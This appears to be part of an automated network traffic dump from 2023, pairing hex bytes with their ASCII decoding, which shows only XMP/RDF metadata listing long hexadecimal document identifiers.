                                                                                                                                                                                    Data Ascii: D6C3F06F9F45364C2</rdf:li> <rdf:li>2A5534DE2EEE9C398B44066EDF3089FE</rdf:li> <rdf:li>2A64B58A0E94CBD93F7A271D452286E6</rdf:li> <rdf:li>2A7275F3FE162EED83B12BF4C6DEC287</rdf:li> <rdf:li>2A757595DEB5B33C712FFD5BC57D18DF</rdf:li> <rdf:li>2A759C9A4E6B6FACAF9D
                                                                                                                                                                                    2023-01-05 07:58:10 UTC719INData Raw: 3e 33 34 44 33 33 31 44 41 46 30 39 31 45 36 38 35 36 30 44 39 38 32 44 42 42 30 36 42 32 33 32 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 34 44 43 46 30 37 37 45 43 38 41 38 31 46 43 38 45 45 36 38 43 39 44 37 32 35 46 43 35 33 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 34 44 44 34 41 32 33 42 41 37 38 45 46 38 37 45 38 36 36 31 30 35 39 38 42 30 44 46 36 32 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 34 45 36 30 33 35 35 45 33 33 41 34 35 34 34 39 31 32 33 35 45 32 37 35 30 34 37 44 34 30 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 34 46 42 42 33 45 39 37 39 30 35 39 30 35 31 36 42 32 46 38 36 31 38 46 37 33 32 42 43 35 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 34 46 43
                                                                                                                                                                                    Data Ascii: >34D331DAF091E68560D982DBB06B2324</rdf:li> <rdf:li>34DCF077EC8A81FC8EE68C9D725FC533</rdf:li> <rdf:li>34DD4A23BA78EF87E86610598B0DF627</rdf:li> <rdf:li>34E60355E33A454491235E275047D400</rdf:li> <rdf:li>34FBB3E9790590516B2F8618F732BC57</rdf:li> <rdf:li>34FC
                                                                                                                                                                                    2023-01-05 07:58:10 UTC735INData Raw: 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 30 38 32 45 44 43 34 45 37 45 39 30 41 42 37 30 34 35 42 32 46 39 45 36 36 33 36 45 30 37 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 30 38 39 32 46 33 38 42 44 39 34 34 33 36 44 38 42 46 36 31 39 41 43 39 32 38 45 39 30 44 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 30 38 44 39 31 35 43 41 38 36 42 43 36 33 36 33 46 37 46 45 44 42 45 45 45 36 30 30 30 39 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 30 38 45 37 33 36 46 36 35 38 38 41 32 30 45 36 34 33 34 42 37 32 43 33 32 37 45 44 35 33 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 30 39 31 38 33 34 38 30 44 39 41 30 45 35 36 38 35 37 37 32 42 38 44 46 45 38 35 42 36 37 44 3c 2f 72 64 66 3a
                                                                                                                                                                                    Data Ascii: /rdf:li> <rdf:li>4082EDC4E7E90AB7045B2F9E6636E076</rdf:li> <rdf:li>40892F38BD94436D8BF619AC928E90D8</rdf:li> <rdf:li>408D915CA86BC6363F7FEDBEEE60009A</rdf:li> <rdf:li>408E736F6588A20E6434B72C327ED53D</rdf:li> <rdf:li>409183480D9A0E5685772B8DFE85B67D</rdf:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC743INData Raw: 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 36 36 30 39 46 44 44 38 35 46 43 43 30 36 31 36 32 37 38 31 45 38 35 35 32 37 43 46 43 38 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 36 36 35 46 31 46 44 35 31 33 33 38 41 37 45 45 43 43 42 43 36 37 35 31 33 41 33 30 44 46 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 36 36 36 45 36 37 38 33 43 45 30 36 35 39 39 41 32 39 33 33 43 42 44 43 42 36 34 36 31 33 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 36 36 38 35 46 45 45 32 43 43 42 43 46 37 37 34 41 30 41 33 46 42 32 43 33 43 34 32 39 36 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 36 36 42 36 45 30 33 32 39 44 37 39 32 37 46 32 43 34 38 34 39 44 35 35 43 36 37 38 41 41 41 3c 2f 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: df:li> <rdf:li>46609FDD85FCC06162781E85527CFC80</rdf:li> <rdf:li>4665F1FD51338A7EECCBC67513A30DF2</rdf:li> <rdf:li>4666E6783CE06599A2933CBDCB64613D</rdf:li> <rdf:li>46685FEE2CCBCF774A0A3FB2C3C42961</rdf:li> <rdf:li>466B6E0329D7927F2C4849D55C678AAA</rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC759INData Raw: 3e 20 3c 72 64 66 3a 6c 69 3e 35 31 36 35 46 46 34 43 32 30 42 44 32 43 30 34 34 37 43 31 43 44 45 44 32 39 33 34 36 42 34 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 31 36 46 34 35 46 44 38 41 34 36 42 41 44 43 37 39 34 45 41 30 44 36 45 45 31 43 37 45 41 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 31 38 30 34 36 35 32 45 34 37 36 31 30 41 31 37 31 45 46 46 30 43 46 41 42 32 31 46 43 39 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 31 42 31 43 45 30 31 46 43 34 41 39 30 44 33 42 31 36 33 42 41 39 39 35 30 44 32 45 46 42 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 31 42 38 46 34 35 31 45 38 34 34 43 45 33 36 31 37 45 36 30 34 41 41 35 38 36 41 31 37 43 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64
                                                                                                                                                                                    Data Ascii: > <rdf:li>5165FF4C20BD2C0447C1CDED29346B41</rdf:li> <rdf:li>516F45FD8A46BADC794EA0D6EE1C7EAA</rdf:li> <rdf:li>51804652E47610A171EFF0CFAB21FC95</rdf:li> <rdf:li>51B1CE01FC4A90D3B163BA9950D2EFB5</rdf:li> <rdf:li>51B8F451E844CE3617E604AA586A17CE</rdf:li> <rd
                                                                                                                                                                                    2023-01-05 07:58:10 UTC775INData Raw: 35 32 41 44 41 44 39 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 44 36 46 46 42 45 35 42 45 45 34 38 39 41 43 42 37 46 33 42 36 44 32 35 34 38 39 41 45 34 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 44 37 36 43 30 43 42 39 35 38 43 36 35 42 44 42 43 33 46 32 33 45 42 35 44 43 39 41 41 45 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 44 39 39 36 37 46 32 31 35 34 34 32 45 31 36 46 46 45 46 33 43 34 34 37 38 37 33 45 43 46 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 44 39 43 35 33 41 33 31 31 44 39 38 32 43 38 45 31 46 39 45 30 42 35 36 37 30 34 31 46 37 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 44 41 45 31 41 42 39 35 42 33 46 43 33 31 37 43 30 46 35 44 45 45 44 34 35 30 44 45
                                                                                                                                                                                    Data Ascii: 52ADAD98</rdf:li> <rdf:li>5D6FFBE5BEE489ACB7F3B6D25489AE40</rdf:li> <rdf:li>5D76C0CB958C65BDBC3F23EB5DC9AAEB</rdf:li> <rdf:li>5D9967F215442E16FFEF3C447873ECF9</rdf:li> <rdf:li>5D9C53A311D982C8E1F9E0B567041F79</rdf:li> <rdf:li>5DAE1AB95B3FC317C0F5DEED450DE
                                                                                                                                                                                    2023-01-05 07:58:10 UTC783INData Raw: 32 43 46 45 32 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 34 30 37 44 38 35 43 30 30 36 41 37 43 45 32 46 34 33 35 43 43 42 30 33 31 36 43 31 44 32 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 34 30 38 45 37 37 37 45 46 43 30 37 44 43 45 41 30 46 36 32 43 30 43 45 33 34 39 42 35 44 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 34 31 39 42 38 30 43 45 43 42 33 37 43 41 43 38 45 38 45 44 34 38 39 38 43 31 33 34 46 43 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 34 31 42 41 39 36 33 35 32 32 32 46 44 33 31 30 42 31 31 33 37 44 37 37 38 46 38 45 37 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 34 32 30 31 30 38 46 33 32 38 32 45 44 33 45 43 37 37 38 31 41 31 30 44 35 37 32 38 30 34
                                                                                                                                                                                    Data Ascii: 2CFE27</rdf:li> <rdf:li>6407D85C006A7CE2F435CCB0316C1D2D</rdf:li> <rdf:li>6408E777EFC07DCEA0F62C0CE349B5D6</rdf:li> <rdf:li>6419B80CECB37CAC8E8ED4898C134FC0</rdf:li> <rdf:li>641BA9635222FD310B1137D778F8E742</rdf:li> <rdf:li>6420108F3282ED3EC7781A10D572804
                                                                                                                                                                                    2023-01-05 07:58:10 UTC799INData Raw: 31 42 32 39 33 39 37 35 31 31 32 41 39 34 45 39 43 32 35 39 38 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 46 43 35 37 43 34 38 36 39 34 31 38 46 44 42 39 37 39 45 44 32 39 39 42 44 35 36 43 30 42 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 46 43 45 46 30 35 33 43 44 44 34 32 32 42 33 35 38 46 37 46 46 44 34 31 30 43 46 45 38 30 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 46 45 42 41 41 43 45 45 46 41 46 30 43 33 43 36 30 30 31 32 43 39 43 35 34 39 41 33 32 45 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 46 45 43 42 38 39 41 39 42 38 38 36 41 30 41 42 31 44 37 46 46 38 30 37 30 38 34 31 46 37 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 46 45 44 42 30 45 45 41 43 38 36 38 45 35
                                                                                                                                                                                    Data Ascii: 1B293975112A94E9C25988</rdf:li> <rdf:li>6FC57C4869418FDB979ED299BD56C0B2</rdf:li> <rdf:li>6FCEF053CDD422B358F7FFD410CFE802</rdf:li> <rdf:li>6FEBAACEEFAF0C3C60012C9C549A32EB</rdf:li> <rdf:li>6FECB89A9B886A0AB1D7FF8070841F74</rdf:li> <rdf:li>6FEDB0EEAC868E5
                                                                                                                                                                                    2023-01-05 07:58:10 UTC815INData Raw: 64 66 3a 6c 69 3e 37 43 30 45 43 34 33 43 42 45 43 36 35 36 41 38 46 46 43 36 30 41 41 45 41 30 43 43 41 34 39 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 43 30 46 43 37 38 33 38 41 30 35 44 42 41 43 41 30 44 34 33 44 39 46 37 45 44 44 33 45 42 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 43 31 31 31 31 34 32 31 38 32 39 43 33 34 30 35 39 34 46 39 31 44 34 31 45 37 42 34 41 39 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 43 32 31 36 44 46 32 30 33 36 46 30 30 38 38 44 37 45 31 43 43 39 46 39 34 42 44 45 36 31 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 43 32 45 44 36 31 42 44 32 35 31 41 42 36 44 32 39 36 31 36 45 43 34 34 31 43 38 39 37 33 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: df:li>7C0EC43CBEC656A8FFC60AAEA0CCA499</rdf:li> <rdf:li>7C0FC7838A05DBACA0D43D9F7EDD3EBB</rdf:li> <rdf:li>7C1111421829C340594F91D41E7B4A97</rdf:li> <rdf:li>7C216DF2036F0088D7E1CC9F94BDE610</rdf:li> <rdf:li>7C2ED61BD251AB6D29616EC441C89734</rdf:li> <rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC838INData Raw: 33 35 35 35 46 38 30 46 44 41 31 36 34 38 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 31 44 41 38 46 33 33 46 35 35 33 37 39 38 44 32 44 35 36 37 45 37 37 41 39 33 42 31 45 44 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 31 44 45 39 39 41 41 41 43 31 41 32 34 42 31 33 33 38 34 43 46 38 44 35 30 44 31 45 44 38 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 31 45 31 41 32 38 46 46 31 46 44 45 43 38 44 39 42 36 44 34 43 32 35 46 30 31 45 34 37 36 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 31 45 37 38 43 37 35 42 35 46 34 42 46 35 39 41 32 34 43 43 35 39 30 37 38 42 39 45 41 36 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 31 45 39 42 31 30 38 46 34 42 45 41 33 44 32 44 34 38 37 35 36
                                                                                                                                                                                    Data Ascii: 3555F80FDA1648A</rdf:li> <rdf:li>81DA8F33F553798D2D567E77A93B1ED3</rdf:li> <rdf:li>81DE99AAAC1A24B13384CF8D50D1ED85</rdf:li> <rdf:li>81E1A28FF1FDEC8D9B6D4C25F01E476C</rdf:li> <rdf:li>81E78C75B5F4BF59A24CC59078B9EA61</rdf:li> <rdf:li>81E9B108F4BEA3D2D48756
                                                                                                                                                                                    2023-01-05 07:58:10 UTC872INData Raw: 42 39 44 44 34 36 33 45 46 33 30 42 34 32 32 39 36 42 34 44 33 41 31 39 44 35 35 35 31 37 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 42 41 33 39 33 46 44 39 32 36 35 31 35 31 42 30 42 42 34 43 38 37 33 42 32 39 37 39 33 37 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 42 41 43 32 37 35 33 41 41 31 42 41 31 41 36 31 37 34 46 41 39 43 31 44 34 45 44 38 36 34 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 42 42 36 46 44 35 39 30 30 42 35 42 42 42 41 32 33 36 43 41 36 31 42 39 38 33 35 31 31 33 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 42 43 35 44 45 36 44 36 39 34 34 36 32 39 32 35 35 41 43 46 44 35 44 45 34 44 35 36 32 37 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 42 43 43 34 45
                                                                                                                                                                                    Data Ascii: B9DD463EF30B42296B4D3A19D555172</rdf:li> <rdf:li>8BA393FD9265151B0BB4C873B2979372</rdf:li> <rdf:li>8BAC2753AA1BA1A6174FA9C1D4ED8644</rdf:li> <rdf:li>8BB6FD5900B5BBBA236CA61B9835113A</rdf:li> <rdf:li>8BC5DE6D6944629255ACFD5DE4D56273</rdf:li> <rdf:li>8BCC4E
                                                                                                                                                                                    2023-01-05 07:58:10 UTC888INData Raw: 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 38 30 35 33 35 33 45 30 36 37 34 31 38 39 43 41 39 43 46 41 33 46 45 34 43 42 35 46 37 36 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 38 31 32 45 42 46 35 45 41 32 42 33 32 34 35 35 41 45 45 44 42 32 36 44 39 43 32 46 43 32 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 38 31 35 43 38 46 31 36 43 34 36 30 45 34 44 37 34 31 38 46 30 46 32 42 38 38 38 46 36 37 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 38 31 39 36 44 33 36 45 34 31 45 39 45 37 31 36 36 43 33 44 39 38 39 43 43 30 31 35 42 37 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 38 31 41 43 31 34 42 44 41 35 39 37 37 31 32 33 43 31 36 42 32 39 38 32 31 30 38 33 30 36 44 3c 2f 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: df:li> <rdf:li>9805353E0674189CA9CFA3FE4CB5F762</rdf:li> <rdf:li>9812EBF5EA2B32455AEEDB26D9C2FC2F</rdf:li> <rdf:li>9815C8F16C460E4D7418F0F2B888F67D</rdf:li> <rdf:li>98196D36E41E9E7166C3D989CC015B75</rdf:li> <rdf:li>981AC14BDA5977123C16B2982108306D</rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC896INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 44 37 30 36 37 33 44 43 36 36 37 43 39 37 46 34 46 39 42 37 33 43 32 34 37 36 32 33 38 33 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 44 38 31 35 35 32 37 42 31 45 36 30 41 46 38 35 34 46 45 42 36 37 37 30 37 41 32 44 37 33 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 44 39 30 46 46 34 39 43 42 30 39 31 46 41 43 44 46 45 30 36 37 41 42 34 30 31 41 36 33 39 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 44 41 32 39 30 42 41 32 35 34 31 39 42 38 39 37 33 34 39 37 30 41 39 41 44 34 45 45 34 34 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 44 42 31 46 41 37 34 33 33 34 38 46 34 44 33 43 34 31 45 41 46 35 36 37 41 30 35 46 31 30 45 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>9D70673DC667C97F4F9B73C247623836</rdf:li> <rdf:li>9D815527B1E60AF854FEB67707A2D73A</rdf:li> <rdf:li>9D90FF49CB091FACDFE067AB401A639C</rdf:li> <rdf:li>9DA290BA25419B89734970A9AD4EE44D</rdf:li> <rdf:li>9DB1FA743348F4D3C41EAF567A05F10E</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC913INData Raw: 66 3a 6c 69 3e 39 45 32 44 30 42 44 44 46 44 32 43 39 32 36 46 41 30 38 34 36 37 42 34 42 35 36 34 34 38 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 45 33 30 34 46 42 46 38 42 33 38 43 41 32 45 37 38 33 43 34 36 36 37 35 41 43 36 33 32 32 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 45 33 30 39 34 39 44 36 46 31 31 35 45 44 41 43 39 30 35 42 37 38 44 44 32 42 34 36 36 31 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 45 33 33 38 46 46 44 38 43 36 45 33 33 44 46 43 32 34 42 39 42 45 33 38 41 30 39 42 37 45 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 45 33 42 35 37 33 39 41 44 38 36 39 31 42 44 45 37 33 41 35 45 37 41 33 37 38 35 38 46 46 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e
                                                                                                                                                                                    Data Ascii: f:li>9E2D0BDDFD2C926FA08467B4B5644813</rdf:li> <rdf:li>9E304FBF8B38CA2E783C46675AC6322B</rdf:li> <rdf:li>9E30949D6F115EDAC905B78DD2B46614</rdf:li> <rdf:li>9E338FFD8C6E33DFC24B9BE38A09B7EE</rdf:li> <rdf:li>9E3B5739AD8691BDE73A5E7A37858FF5</rdf:li> <rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC929INData Raw: 34 31 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 39 37 35 31 32 34 36 41 36 36 41 44 32 34 37 37 43 44 42 37 34 45 43 45 38 34 41 31 42 45 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 39 37 39 46 31 30 32 41 44 41 35 37 45 38 46 30 37 33 31 42 44 36 38 37 42 31 44 33 33 39 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 39 37 42 42 38 43 36 31 42 32 30 38 30 30 34 37 31 37 36 44 31 39 46 37 33 31 30 31 39 41 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 39 38 35 36 45 46 39 43 32 39 33 35 41 42 38 36 42 34 44 36 45 34 30 33 46 34 32 31 34 30 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 39 39 32 37 41 42 42 44 33 44 43 44 39 42 33 35 32 33 37 30 33 33 38 35 41 42 38 44 36 46 46 3c 2f
                                                                                                                                                                                    Data Ascii: 414</rdf:li> <rdf:li>A9751246A66AD2477CDB74ECE84A1BEC</rdf:li> <rdf:li>A979F102ADA57E8F0731BD687B1D3395</rdf:li> <rdf:li>A97BB8C61B2080047176D19F731019AF</rdf:li> <rdf:li>A9856EF9C2935AB86B4D6E403F421407</rdf:li> <rdf:li>A9927ABBD3DCD9B3523703385AB8D6FF</
                                                                                                                                                                                    2023-01-05 07:58:10 UTC961INData Raw: 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 34 44 39 34 42 33 46 41 42 31 34 44 39 43 34 33 42 42 30 41 34 38 34 32 39 34 44 33 45 42 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 34 44 43 44 38 38 33 35 34 31 42 46 30 33 46 31 39 42 41 35 31 32 44 43 38 31 35 31 43 44 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 34 45 33 39 37 35 37 39 42 38 39 32 31 41 42 30 41 39 36 31 46 31 43 36 37 35 46 30 30 41 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 34 45 42 37 44 30 42 37 35 31 39 34 41 37 44 41 38 36 37 41 42 43 37 43 37 38 34 45 39 44 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 34 46 35 42 36 38 46 38 36 43 41 46 32 46 37 39 32 42 37 38 46 44 35 32 33 30 31 43 45 36 31 3c 2f 72 64 66 3a 6c
                                                                                                                                                                                    Data Ascii: rdf:li> <rdf:li>B4D94B3FAB14D9C43BB0A484294D3EBC</rdf:li> <rdf:li>B4DCD883541BF03F19BA512DC8151CD9</rdf:li> <rdf:li>B4E397579B8921AB0A961F1C675F00A6</rdf:li> <rdf:li>B4EB7D0B75194A7DA867ABC7C784E9DD</rdf:li> <rdf:li>B4F5B68F86CAF2F792B78FD52301CE61</rdf:l
                                                                                                                                                                                    2023-01-05 07:58:10 UTC968INData Raw: 37 31 45 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 39 37 34 41 34 44 41 34 42 39 32 33 43 35 39 30 43 36 36 33 32 45 37 41 45 35 41 44 38 46 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 39 37 46 35 46 30 34 38 41 34 43 42 42 34 35 33 34 39 38 45 31 46 42 32 43 36 41 43 36 32 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 39 38 36 45 44 32 31 37 36 34 41 39 36 30 41 44 46 33 36 34 33 36 36 38 30 38 36 38 37 32 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 39 39 33 34 46 31 45 37 38 37 38 33 38 33 30 39 31 33 45 37 36 32 45 45 31 39 30 32 35 34 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 39 39 43 34 30 36 31 35 34 36 44 36 36 42 30 31 34 39 33 38 34 37 33 30 33 30 42 39 35 41 43 3c
                                                                                                                                                                                    Data Ascii: 71EF</rdf:li> <rdf:li>B974A4DA4B923C590C6632E7AE5AD8F3</rdf:li> <rdf:li>B97F5F048A4CBB453498E1FB2C6AC623</rdf:li> <rdf:li>B986ED21764A960ADF36436680868726</rdf:li> <rdf:li>B9934F1E78783830913E762EE1902547</rdf:li> <rdf:li>B99C4061546D66B014938473030B95AC<
                                                                                                                                                                                    2023-01-05 07:58:10 UTC992INData Raw: 45 30 30 44 30 46 36 34 39 42 38 38 33 37 33 45 45 42 39 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 35 35 38 44 38 36 30 39 32 42 32 42 30 42 36 41 39 35 37 42 42 42 37 44 39 45 37 41 32 35 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 35 38 33 35 38 30 42 31 35 32 30 42 38 31 34 33 36 36 34 45 41 39 42 34 35 38 43 31 31 37 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 35 38 34 32 38 39 35 43 34 42 30 32 33 39 46 41 36 37 41 42 30 35 41 32 46 38 44 46 39 37 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 35 38 34 34 38 38 31 32 36 45 43 44 32 31 39 33 46 45 43 45 34 31 39 37 37 42 38 33 43 31 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 35 38 42 41 30 32 30 46 37 35 36 44 34 34 30 44
                                                                                                                                                                                    Data Ascii: E00D0F649B88373EEB9D</rdf:li> <rdf:li>C558D86092B2B0B6A957BBB7D9E7A25E</rdf:li> <rdf:li>C583580B1520B8143664EA9B458C1177</rdf:li> <rdf:li>C5842895C4B0239FA67AB05A2F8DF972</rdf:li> <rdf:li>C584488126ECD2193FECE41977B83C1F</rdf:li> <rdf:li>C58BA020F756D440D
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1008INData Raw: 3a 6c 69 3e 43 46 42 36 39 30 39 45 46 45 39 38 45 35 39 30 42 42 31 45 44 31 39 39 37 32 46 42 42 43 39 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 46 42 45 43 43 39 45 34 30 37 37 43 45 33 33 44 46 42 41 42 42 36 36 35 37 44 33 44 30 31 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 46 43 38 34 38 44 43 38 30 30 35 41 38 44 35 34 44 46 31 33 33 37 45 36 41 32 31 45 42 33 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 46 43 39 31 32 38 35 36 35 32 43 37 33 45 45 32 45 36 44 39 31 42 33 37 41 41 31 38 39 30 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 46 44 37 36 31 42 46 42 42 41 34 32 41 38 34 36 37 35 32 36 34 35 34 36 35 39 42 30 38 31 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44
                                                                                                                                                                                    Data Ascii: :li>CFB6909EFE98E590BB1ED19972FBBC9C</rdf:li> <rdf:li>CFBECC9E4077CE33DFBABB6657D3D017</rdf:li> <rdf:li>CFC848DC8005A8D54DF1337E6A21EB38</rdf:li> <rdf:li>CFC91285652C73EE2E6D91B37AA1890E</rdf:li> <rdf:li>CFD761BFBBA42A8467526454659B0816</rdf:li> <rdf:li>D
